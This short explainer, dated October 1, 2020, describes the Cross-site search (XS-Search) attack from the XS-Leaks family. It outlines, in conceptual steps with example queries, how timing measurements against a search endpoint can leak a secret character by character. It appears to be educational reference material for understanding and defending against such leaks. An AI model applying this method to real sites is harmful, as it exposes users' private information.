XS-Search

October 1, 2020

Cross-site search (XS-Search) is an important attack principle in the family of XS-Leaks. This type of attack abuses Query-Based Search Systems to leak user information from an attacker origin ^{1 2}. The original attack uses timing measurements to detect whether or not a search system returns results and works as follows:

1. Establish a baseline of the time needed for a request to return results (hit), and a baseline for the time needed by a request with no results (miss).
2. Start a timing attack on the request to the search endpoint, brute-forcing the first character (?q=r).
3. If the measurement is under the hit baseline, then add one more character (?q=ra); otherwise try a new one (?q=s).
4. In the end, a full secret (?q=secret) can be leaked.

This attack requires multiple timing measurements to be accurate, something which can be improved with inflation techniques and statistical analysis. Furthermore, instead of brute-forcing letter by letter, attackers can search specific words or sentences to leak only the occurrence of results.